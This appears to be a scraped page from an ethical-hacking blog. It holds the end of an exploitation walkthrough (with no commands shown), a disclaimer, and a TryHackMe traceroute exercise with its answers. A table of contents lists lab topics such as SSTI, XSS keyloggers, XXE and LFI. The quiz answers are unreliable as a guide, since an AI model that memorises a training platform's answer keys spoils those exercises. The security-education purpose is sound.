
Just need to set RHOST (Remote host) and verbose, let's go ahead and set those!

Should be all set, lets run it!

There we go! Update your servers, folks!

Flags:

Video Tutorial :-

Disclaimer

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing malicious or damaging attacks. Performing any hacks without written permission is illegal ..!

All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.

All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.

- Hacking Truth by Kumar Atul Jaiswal

I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)

The logical follow-up to the ping command is 'traceroute'. The easiest way to understand what traceroute does is to think of your home network. Say, for example, that you have a wireless router. Your phone is connected to it, as is your computer. What happens if you want to send something to your phone from your computer? You can't just send stuff directly to your phone -- not without directly connecting them, so how would the information get across? The request would first be sent to your router which acts as a gateway. The router knows every device that's connected to it, ergo, it knows how to get to your phone. The router then forwards your request on to your phone and facilitates the return connection in the same way. Traceroute can be used to map the path your request takes as it heads to the target machine. Networking tool traceroute

The internet is made up of many, many different servers and end-points, all networked up to each other. This means that, in order to get to the content you actually want, you first need to go through a bunch of other servers. Traceroute allows you to see each of these connections -- it allows you to see every intermediate step between your computer and the resource that you requested. The basic syntax for traceroute on Linux is this: traceroute <destination>

By default, traceroute operates using the same ICMP protocol that ping utilises, however, this can be altered with switches.

You can see that it took 13 hops to get from my router (_gateway) to the Google server at 216.58.205.46

Now it's your turn. As with before, all questions about switches can be answered with the man page for traceroute
(man traceroute).

#1 Use traceroute on tryhackme.com
Can you see the path your request has taken?

#2 What switch would you use to specify an interface when using Traceroute?

Ans :- -i

#3 What switch would you use if you wanted to use TCP requests when tracing the route?

Ans :- -T

#4 [Lateral Thinking] Which layer of the TCP/IP model will traceroute run on by default?

Internet

I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)

WHAT WE DO

We've been developing corporate tailored services for clients for 30 years.

ABOUT US

OUR TEAM

Kumar Atul Jaiswal

Kumar Atul Jaiswal

Kumar Atul Jaiswal

OUR SKILLS

Marketing

Websites

PR

ACHIEVEMENTS

STRATEGY & CREATIVITY

PORTFOLIO

Contents

Enumeration with the Nmap:

(adsbygoogle = window.adsbygoogle || []).push({});

Exploitation:

Privilege Escalation:

Quiz Time

Disclaimer

[Task 1] Introduction

Task 2] Methodology

[Task 3] [Section 1 - SSTI] - What is SSTI

[Task 4] [Section 1 - SSTI] - Manual exploitation of SSTI.

[Task 5] [Section 1 - SSTI]: Automatic Exploitation of SSTI

[Task 6][Section 1 - SSTI]: Challenge

Disclaimer

[Task 1] Introduction

[Task 2] Deploy your XSS Playground

[Task 3] Stored XSS

[Task 4] Reflected XSS

[Task 5] DOM-Based XSS

[Task 6] Using XSS for IP and Port Scanning

[Task 7] XSS Keylogger

[Task 8] Filter Evasion

[Task 9] Protection Methods & Other Exploits

Disclaimer

[Task 1] Deploy the VM

[Task 2] eXtensible Markup Language

[Task 3] DTD

[Task 4] XXE payload

[Task 5] Exploiting

Disclaimer

[Task 1] Deploy

[Task 2] Getting user access via LFI

[Task 3] Escalating your privileges to root

Disclaimer

Introduction to Heartbleed and SSL/TLS

Analysing the Bug

Heartbleed Bug Discovery

Protecting Data In Transit

Disclaimer

Ads

Youtube

Linkedln

Popular Posts

Like Us

Labels

Let's Talk About

Tweet

Connection

WHAT WE DO

ANALYTICS

CONSULTING

DESIGN

DEVELOPMENT

MARKETING

SEO

CONTACT US

Hacking Truth.in